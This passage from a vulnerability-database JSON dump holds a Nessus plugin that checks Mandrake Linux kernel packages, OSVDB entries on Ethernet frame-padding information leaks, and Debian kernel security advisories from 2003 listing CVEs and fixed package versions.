script_xref(name:\"MDKSA\", value:\"2003:066-2\");\n\n script_name(english:\"Mandrake Linux Security Advisory : kernel (MDKSA-2003:066-2)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities were discovered and fixed in the Linux\nkernel.\n\n - CVE-2003-0001: Multiple ethernet network card drivers do\n not pad frames with null bytes which allows remote\n attackers to obtain information from previous packets or\n kernel memory by using special malformed packets.\n\n - CVE-2003-0244: The route cache implementation in the 2.4\n kernel and the Netfilter IP conntrack module allows\n remote attackers to cause a Denial of Service (DoS) via\n CPU consumption due to packets with forged source\n addresses that cause a large number of hash table\n collisions related to the PREROUTING chain.\n\n - CVE-2003-0246: The ioperm implementation in 2.4.20 and\n earlier kernels does not properly restrict privileges,\n which allows local users to gain read or write access to\n certain I/O ports.\n\n - CVE-2003-0247: A vulnerability in the TTY layer of the\n 2.4 kernel allows attackers to cause a kernel oops\n resulting in a DoS.\n\n - CVE-2003-0248: The mxcsr code in the 2.4 kernel allows\n attackers to modify CPU state registers via a malformed\n address.\n\n - CVE-2003-0462: A file read race existed in the execve()\n system call.\n\nAs well, a number of bug fixes were made in the 9.1 kernel including :\n\n - Support for more machines that did not work with APIC\n\n - Audigy2 support\n\n - New/updated modules: prims25, adiusbadsl, thinkpad,\n ieee1394, orinoco, via-rhine,\n\n - Fixed SiS IOAPIC\n\n - IRQ balancing has been fixed for SMP\n\n - Updates to ext3\n\n - The previous ptrace fix has been redone to work better\n\n - Bugs with compiling kernels using xconfig have been\n fixed\n\n - Problems with ipsec have been corrected\n\n - XFS ACLs are now present\n\n - gdb not working on XFS root filesystems has been fixed\n\nMandrakeSoft encourages all users to upgrade to these new kernels.\nUpdated kernels will be available shortly for other supported\nplatforms and architectures.\n\nFor full instructions on how to properly upgrade your kernel, please\nreview http://www.mandrakesecure.net/en/docs/magic.php.\n\nUpdate :\n\nThe kernels provided in MDKSA-2003:066-1 (2.4.21-0.24mdk) had a\nproblem where all files created on any filesystem other than XFS, and\nusing any kernel other than kernel-secure, would be created with mode\n0666, or world writeable. The 0.24mdk kernels have been removed from\nthe mirrors and users are encouraged to upgrade and remove those\nkernels from their systems to prevent accidentally booting into them.\n\nThat issue has been addressed and fixed with these new kernels.\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=105664924024009&w=2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://marc.info/?l=bugtraq&m=105664924024009&w=2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-2.4.21.0.25mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-BOOT-2.4.21.0.25mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-enterprise-2.4.21.0.25mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-secure-2.4.21.0.25mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-smp-2.4.21.0.25mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"kernel-2.4.21.0.25mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"kernel-BOOT-2.4.21.0.25mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"kernel-doc-2.4.21-0.25mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"kernel-enterprise-2.4.21.0.25mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"kernel-secure-2.4.21.0.25mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"kernel-smp-2.4.21.0.25mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"kernel-source-2.4.21-0.25mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:58", "references": [], "edition": 1, "description": "## Vulnerability Description\nMultiple Ethernet Network Interface Card (NIC) Device Drivers contain flaws that may result in an information leakage vulnerability. The issue is triggered when Ethernet device drivers reuse old frame buffer data to pad packets. It is possible that the flaw may allow that may allow remote attackers to harvest sensitive information from affected devices resulting in a loss of confidentiality.\n## Solution Description\nContact vendor for upgrade to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nMultiple Ethernet Network Interface Card (NIC) Device Drivers contain flaws that may result in an information leakage vulnerability. The issue is triggered when Ethernet device drivers reuse old frame buffer data to pad packets. It is possible that the flaw may allow that may allow remote attackers to harvest sensitive information from affected devices resulting in a loss of confidentiality.\n## References:\n[Vendor Specific Advisory URL](http://www.vmware.com/support/kb/enduser/std_adp.php?p_sid=FsNALBWh&p_lva=&p_faqid=1437)\n[Vendor Specific Advisory URL](http://www.debian.org/security/2003/dsa-311)\n[Vendor Specific Advisory URL](http://itrc.hp.com/cki/bin/doc.pl/screen=ckiSecurityBulletin)\n[Vendor Specific Advisory URL](http://www.linuxsecurity.com/advisories/engarde_advisory-2976.html)\n[Vendor Specific Advisory URL](http://a1851.g.akamaitech.net/f/1851/2996/24h/cache.xerox.com/downloads/usa/en/c/CERT_VU412115.pdf)\n[Secunia Advisory ID:10817](https://secuniaresearch.flexerasoftware.com/advisories/10817/)\n[Secunia Advisory ID:11283](https://secuniaresearch.flexerasoftware.com/advisories/11283/)\n[Related OSVDB ID: 2270](https://vulners.com/osvdb/OSVDB:2270)\n[Related OSVDB ID: 2615](https://vulners.com/osvdb/OSVDB:2615)\nOther Advisory URL: http://www.nextgenss.com/advisories/etherleak-2003.txt\nGeneric Informational URL: http://www.atstake.com/research/advisories/2003/a010603-1.txt\nGeneric Informational URL: http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf\n[CVE-2003-0001](https://vulners.com/cve/CVE-2003-0001)\nCERT VU: 412115\n", "reporter": "OSVDB", "published": "2004-02-09T08:23:38", "type": "osvdb", "title": "Multiple Ethernet Driver Frame Padding Information Disclosure", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "FreeBSD", "version": "4.4", "operator": "eq"}, {"name": "ZyNOS", "version": "V3.40(ES.5)", "operator": "eq"}, {"name": "Kernel", "version": "2.2.20", "operator": "eq"}, {"name": "Kernel", "version": "2.4.1", "operator": "eq"}, {"name": "Kernel", "version": "2.4.18", "operator": "eq"}, {"name": "JetDirect", "version": "J6035A", "operator": "eq"}, {"name": "Kernel", "version": "2.4.10", "operator": "eq"}, {"name": "Kernel", "version": "2.2.15", "operator": "eq"}, {"name": "Kernel", "version": "2.4.13", "operator": "eq"}, {"name": "Kernel", "version": "2.4.3", "operator": "eq"}, {"name": "Kernel", "version": "2.4.15", "operator": "eq"}, {"name": "Kernel", "version": "2.4.17", "operator": "eq"}, {"name": "Kernel", "version": "2.2.19", "operator": "eq"}, {"name": "FreeBSD", "version": "4.3", "operator": "eq"}, {"name": "Kernel", "version": "2.4.8", "operator": "eq"}, {"name": "Kernel", "version": "2.4.12", "operator": "eq"}, {"name": "FreeBSD", "version": "4.7", "operator": "eq"}, {"name": "Kernel", "version": "2.4.2", "operator": "eq"}, {"name": "Kernel", "version": "2.4.16", "operator": "eq"}, {"name": "Kernel", "version": "2.4.5", "operator": "eq"}, {"name": "Kernel", "version": "2.2.16", "operator": "eq"}, {"name": "Kernel", "version": "2.2.14", "operator": "eq"}, {"name": "HP-UX", "version": "11.0", "operator": "eq"}, {"name": "FreeBSD", "version": "4.2", "operator": "eq"}, {"name": "Kernel", "version": "2.2.17", "operator": "eq"}, {"name": "FreeBSD", "version": "4.5", "operator": "eq"}, {"name": "Kernel", "version": "2.4.9", "operator": "eq"}, {"name": "Kernel", "version": "2.4.4", "operator": "eq"}, {"name": "Kernel", "version": "2.4.14", "operator": "eq"}, {"name": "FreeBSD", "version": "4.6", "operator": "eq"}, {"name": "Kernel", "version": "2.4.6", "operator": "eq"}, {"name": "Kernel", "version": "2.4.11", "operator": "eq"}, {"name": "Kernel", "version": "2.4.7", "operator": "eq"}, {"name": "Kernel", "version": "2.0.x", "operator": "eq"}, {"name": "HP-UX", "version": "10.20", "operator": "eq"}, {"name": "Kernel", "version": "2.2.18", "operator": "eq"}], "cvelist": ["CVE-2003-0001"], "modified": "2004-02-09T08:23:38", "href": "https://vulners.com/osvdb/OSVDB:3873", "id": "OSVDB:3873", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:05", "references": [], "edition": 1, "description": "## Vulnerability Description\nSome ZyXEL Prestige devices contains a flaw that may lead to an unauthorized information disclosure. \u00a0ARP requests emitted by device could contain random parts of the memory (especially parts of recent telnet sessions) , which will disclose sensitive information to an attacker able to sniff the local network resulting in a loss of confidentiality.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nSome ZyXEL Prestige devices contains a flaw that may lead to an unauthorized information disclosure. \u00a0ARP requests emitted by device could contain random parts of the memory (especially parts of recent telnet sessions) , which will disclose sensitive information to an attacker able to sniff the local network resulting in a loss of confidentiality.\n## References:\nVendor URL: http://www.zyxel.com/\nSecurity Tracker: 1008999\nMail List Post: http://whitestar.linuxbox.org/pipermail/exploits/2007-March/000165.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-09/0127.html\nISS X-Force ID: 17372\n[CVE-2004-1684](https://vulners.com/cve/CVE-2004-1684)\n[CVE-2003-0001](https://vulners.com/cve/CVE-2003-0001)\nBugtraq ID: 11167\n", "reporter": "Przemyslaw Frasunek(venglin@freebsd.lublin.pl)", "published": "2004-09-13T00:00:00", "type": "osvdb", "title": "ZyXEL Prestige 681 ARP Request Packet Information Disclosure", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Prestige 681", "version": "Unknown or Unspecified", "operator": "eq"}, {"name": "ZyNOS", "version": "Vt020225a", "operator": "eq"}], "cvelist": ["CVE-2003-0001", "CVE-2004-1684"], "modified": "2004-09-13T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:9962", "id": "OSVDB:9962", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "debian": [{"lastseen": "2016-09-02T18:32:39", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "i686", "packageFilename": "kernel-pcmcia-modules-2.4.18-1-386_2.4.18-8_i386.deb", "packageName": "kernel-pcmcia-modules-2.4.18-1-386", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-9", "arch": "src", "packageFilename": "kernel-source-2.4.18_2.4.18-9.dsc", "packageName": "kernel-source-2.4.18", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-5woody1", "arch": "src", "packageFilename": "kernel-image-2.4.18-i386bf_2.4.18-5woody1.dsc", "packageName": "kernel-image-2.4.18-i386bf", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-5woody1", "arch": "i686", "packageFilename": "kernel-headers-2.4.18-bf2.4_2.4.18-5woody1_i386.deb", "packageName": "kernel-headers-2.4.18-bf2.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "i686", "packageFilename": "kernel-headers-2.4.18-1-386_2.4.18-8_i386.deb", "packageName": "kernel-headers-2.4.18-1-386", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "3.1.33-6woody1k5woody1", "arch": "i686", "packageFilename": "pcmcia-modules-2.4.18-bf2.4_3.1.33-6woody1k5woody1_i386.deb", "packageName": "pcmcia-modules-2.4.18-bf2.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "i686", "packageFilename": "kernel-pcmcia-modules-2.4.18-1-k7_2.4.18-8_i386.deb", "packageName": "kernel-pcmcia-modules-2.4.18-1-k7", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "src", "packageFilename": "kernel-image-2.4.18-1-i386_2.4.18-8.dsc", "packageName": "kernel-image-2.4.18-1-i386", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "i686", "packageFilename": "kernel-pcmcia-modules-2.4.18-1-686_2.4.18-8_i386.deb", "packageName": "kernel-pcmcia-modules-2.4.18-1-686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-5woody1", "arch": "i686", "packageFilename": "kernel-image-2.4.18-bf2.4_2.4.18-5woody1_i386.deb", "packageName": "kernel-image-2.4.18-bf2.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "i686", "packageFilename": "kernel-headers-2.4.18-1-686-smp_2.4.18-8_i386.deb", "packageName": "kernel-headers-2.4.18-1-686-smp", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "i686", "packageFilename": "kernel-image-2.4.18-1-k6_2.4.18-8_i386.deb", "packageName": "kernel-image-2.4.18-1-k6", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "i686", "packageFilename": "kernel-headers-2.4.18-1-k6_2.4.18-8_i386.deb", "packageName": "kernel-headers-2.4.18-1-k6", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "i686", "packageFilename": "kernel-headers-2.4.18-1-586tsc_2.4.18-8_i386.deb", "packageName": "kernel-headers-2.4.18-1-586tsc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-9.diff", "arch": "src", "packageFilename": "kernel-source-2.4.18_2.4.18-9.diff.gz", "packageName": "kernel-source-2.4.18", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "i686", "packageFilename": "kernel-headers-2.4.18-1-686_2.4.18-8_i386.deb", "packageName": "kernel-headers-2.4.18-1-686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "i686", "packageFilename": "kernel-image-2.4.18-1-k7_2.4.18-8_i386.deb", "packageName": "kernel-image-2.4.18-1-k7", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-5woody1", "arch": "src", "packageFilename": "kernel-image-2.4.18-i386bf_2.4.18-5woody1.tar.gz", "packageName": "kernel-image-2.4.18-i386bf", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "i686", "packageFilename": "kernel-image-2.4.18-1-586tsc_2.4.18-8_i386.deb", "packageName": "kernel-image-2.4.18-1-586tsc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "i686", "packageFilename": "kernel-headers-2.4.18-1-k7_2.4.18-8_i386.deb", "packageName": "kernel-headers-2.4.18-1-k7", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "src", "packageFilename": "kernel-image-2.4.18-1-i386_2.4.18-8.tar.gz", "packageName": "kernel-image-2.4.18-1-i386", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "i686", "packageFilename": "kernel-pcmcia-modules-2.4.18-1-586tsc_2.4.18-8_i386.deb", "packageName": "kernel-pcmcia-modules-2.4.18-1-586tsc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "i686", "packageFilename": "kernel-pcmcia-modules-2.4.18-1-686-smp_2.4.18-8_i386.deb", "packageName": "kernel-pcmcia-modules-2.4.18-1-686-smp", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-9", "arch": "all", "packageFilename": "kernel-doc-2.4.18_2.4.18-9_all.deb", "packageName": "kernel-doc-2.4.18", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "i686", "packageFilename": "kernel-image-2.4.18-1-386_2.4.18-8_i386.deb", "packageName": "kernel-image-2.4.18-1-386", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "i686", "packageFilename": "kernel-pcmcia-modules-2.4.18-1-k6_2.4.18-8_i386.deb", "packageName": "kernel-pcmcia-modules-2.4.18-1-k6", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "i686", "packageFilename": "kernel-image-2.4.18-1-686_2.4.18-8_i386.deb", "packageName": "kernel-image-2.4.18-1-686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "i686", "packageFilename": "kernel-image-2.4.18-1-686-smp_2.4.18-8_i386.deb", "packageName": "kernel-image-2.4.18-1-686-smp", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-8", "arch": "i686", "packageFilename": "kernel-headers-2.4.18-1_2.4.18-8_i386.deb", "packageName": "kernel-headers-2.4.18-1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-9", "arch": "all", "packageFilename": "kernel-source-2.4.18_2.4.18-9_all.deb", "packageName": "kernel-source-2.4.18", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18.orig", "arch": "src", "packageFilename": "kernel-source-2.4.18_2.4.18.orig.tar.gz", "packageName": "kernel-source-2.4.18", "operator": "lt"}], "description": "A number of vulnerabilities have been discovered in the Linux kernel.\n\nCVE-2002-0429: The iBCS routines in arch/i386/kernel/traps.c for Linux kernels 2.4.18 and earlier on x86 systems allow local users to kill arbitrary processes via a binary compatibility interface (lcall).\n\nCAN-2003-0001: Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets.\n\nCAN-2003-0127: The kernel module loader allows local users to gain root privileges by using ptrace to attach to a child process that is spawned by the kernel.\n\nCAN-2003-0244: The route cache implementation in Linux 2.4, and the Netfilter IP conntrack module, allows remote attackers to cause a denial of service (CPU consumption) via packets with forged source addresses that cause a large number of hash table collisions related to the PREROUTING chain.\n\nCAN-2003-0246: The ioperm system call in Linux kernel 2.4.20 and earlier does not properly restrict privileges, which allows local users to gain read or write access to certain I/O ports.\n\nCAN-2003-0247: Vulnerability in the TTY layer of the Linux kernel 2.4 allows attackers to cause a denial of service (\"kernel oops\").\n\nCAN-2003-0248: The mxcsr code in Linux kernel 2.4 allows attackers to modify CPU state registers via a malformed address.\n\nCAN-2003-0364: The TCP/IP fragment reassembly handling in the Linux kernel 2.4 allows remote attackers to cause a denial of service (CPU consumption) via certain packets that cause a large number of hash table collisions.\n\nThis advisory covers only the i386 (Intel IA32) architectures. Other architectures will be covered by separate advisories.\n\nFor the stable distribution (woody) on the i386 architecture, these problems have been fixed in kernel-source-2.4.18 version 2.4.18-9, kernel-image-2.4.18-1-i386 version 2.4.18-8, and kernel-image-2.4.18-i386bf version 2.4.18-5woody1.\n\nFor the unstable distribution (sid) these problems are fixed in the 2.4.20 series kernels based on Debian sources.\n\nWe recommend that you update your kernel packages.\n\nIf you are using the kernel installed by the installation system when the \"bf24\" option is selected (for a 2.4.x kernel), you should install the kernel-image-2.4.18-bf2.4 package. If you installed a different kernel-image package after installation, you should install the corresponding 2.4.18-1 kernel. You may use the table below as a guide.\n \n \n | If \"uname -r\" shows: | Install this package:\n | 2.4.18-bf2.4 | kernel-image-2.4.18-bf2.4\n | 2.4.18-386 | kernel-image-2.4.18-1-386\n | 2.4.18-586tsc | kernel-image-2.4.18-1-586tsc\n | 2.4.18-686 | kernel-image-2.4.18-1-686\n | 2.4.18-686-smp | kernel-image-2.4.18-1-686-smp\n | 2.4.18-k6 | kernel-image-2.4.18-1-k6\n | 2.4.18-k7 | kernel-image-2.4.18-1-k7\n \n\nNOTE: that this kernel is not binary compatible with the previous version. For this reason, the kernel has a different version number and will not be installed automatically as part of the normal upgrade process. Any custom modules will need to be rebuilt in order to work with the new kernel. New PCMCIA modules are provided for all of the above kernels.\n\nNOTE: A system reboot will be required immediately after the upgrade in order to replace the running kernel. Remember to read carefully and follow the instructions given during the kernel upgrade process.", "edition": 1, "reporter": "Debian", "published": "2003-06-08T00:00:00", "title": "linux-kernel-2.4.18 -- several vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0248", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0127", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244"], "modified": "2003-06-08T00:00:00", "id": "DSA-311", "href": "http://www.debian.org/security/dsa-311", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-02T18:35:30", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.2.20-5woody3", "packageName": "kernel-image-2.2.20-i386", "arch": "src", "packageFilename": "kernel-image-2.2.20-i386_2.2.20-5woody3.tar.gz", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.2.20-5woody3", "packageName": "kernel-image-2.2.20-idepci", "arch": "i686", "packageFilename": "kernel-image-2.2.20-idepci_2.2.20-5woody3_i386.deb", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.2.20-5woody2", "packageName": "kernel-source-2.2.20", "arch": "all", "packageFilename": "kernel-source-2.2.20_2.2.20-5woody2_all.deb", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.2.20-5woody3", "packageName": "kernel-headers-2.2.20", "arch": "i686", "packageFilename": "kernel-headers-2.2.20_2.2.20-5woody3_i386.deb", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.2.20-5woody2.diff", "packageName": "kernel-source-2.2.20", "arch": "src", "packageFilename": "kernel-source-2.2.20_2.2.20-5woody2.diff.gz", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.2.20-5woody3", "packageName": "kernel-image-2.2.20", "arch": "i686", "packageFilename": "kernel-image-2.2.20_2.2.20-5woody3_i386.deb", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.2.20-5woody3", "packageName": "kernel-image-2.2.20-i386", "arch": "src", "packageFilename": "kernel-image-2.2.20-i386_2.2.20-5woody3.dsc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.2.20-5woody2", "packageName": "kernel-doc-2.2.20", "arch": "all", "packageFilename": "kernel-doc-2.2.20_2.2.20-5woody2_all.deb", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.2.20.orig", "packageName": "kernel-source-2.2.20", "arch": "src", "packageFilename": "kernel-source-2.2.20_2.2.20.orig.tar.gz", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.2.20-5woody3", "packageName": "kernel-image-2.2.20-compact", "arch": "i686", "packageFilename": "kernel-image-2.2.20-compact_2.2.20-5woody3_i386.deb", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.2.20-5woody3", "packageName": "kernel-headers-2.2.20-compact", "arch": "i686", "packageFilename": "kernel-headers-2.2.20-compact_2.2.20-5woody3_i386.deb", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.2.20-5woody2", "packageName": "kernel-source-2.2.20", "arch": "src", "packageFilename": "kernel-source-2.2.20_2.2.20-5woody2.dsc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.2.20-5woody3", "packageName": "kernel-headers-2.2.20-idepci", "arch": "i686", "packageFilename": "kernel-headers-2.2.20-idepci_2.2.20-5woody3_i386.deb", "operator": "lt"}], "edition": 1, "description": "A number of vulnerabilities have been discovered in the Linux kernel.\n\n * [CAN-2002-1380](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1380>): Linux kernel 2.2.x allows local users to cause a denial of service (crash) by using the mmap() function with a PROT_READ parameter to access non-readable memory pages through the /proc/pid/mem interface.\n * [CVE-2002-0429](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0429>): The iBCS routines in arch/i386/kernel/traps.c for Linux kernels 2.4.18 and earlier on x86 systems allow local users to kill arbitrary processes via a binary compatibility interface (lcall)\n * [CAN-2003-0001](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0001>): Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets\n * [CAN-2003-0127](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0127>): The kernel module loader allows local users to gain root privileges by using ptrace to attach to a child process that is spawned by the kernel\n * [CAN-2003-0244](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0244>): The route cache implementation in Linux 2.4, and the Netfilter IP conntrack module, allows remote attackers to cause a denial of service (CPU consumption) via packets with forged source addresses that cause a large number of hash table collisions related to the PREROUTING chain\n * [CAN-2003-0246](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0246>): The ioperm system call in Linux kernel 2.4.20 and earlier does not properly restrict privileges, which allows local users to gain read or write access to certain I/O ports.\n * [CAN-2003-0247](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0247>): vulnerability in the TTY layer of the Linux kernel 2.4 allows attackers to cause a denial of service (\"kernel oops\")\n * [CAN-2003-0248](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0248>): The mxcsr code in Linux kernel 2.4 allows attackers to modify CPU state registers via a malformed address.\n * [CAN-2003-0364](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0364>): The TCP/IP fragment reassembly handling in the Linux kernel 2.4 allows remote attackers to cause a denial of service (CPU consumption) via 